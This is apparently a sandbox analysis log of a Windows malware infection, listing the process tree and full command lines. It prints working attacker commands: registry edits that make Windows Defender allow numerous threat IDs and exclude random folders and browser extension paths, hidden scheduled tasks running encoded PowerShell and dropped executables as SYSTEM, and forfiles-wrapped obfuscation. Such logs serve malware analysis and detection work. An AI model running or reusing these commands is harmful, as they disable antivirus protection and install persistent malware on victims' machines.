C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbGzdkxaI" /SC once /ST 13:08:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbGzdkxaI"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gbGzdkxaI"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 00:19:47 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\sXxfxiL.exe\" aV /yXdOdidmB 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "yfARWRprRqUFWeTGf"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k smphost1⤵
-
C:\Users\Admin\AppData\Roaming\explorer.exeC:\Users\Admin\AppData\Roaming\explorer.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe1⤵
- Executes dropped EXE
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\sXxfxiL.exeC:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\sXxfxiL.exe aV /yXdOdidmB 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"2⤵
-
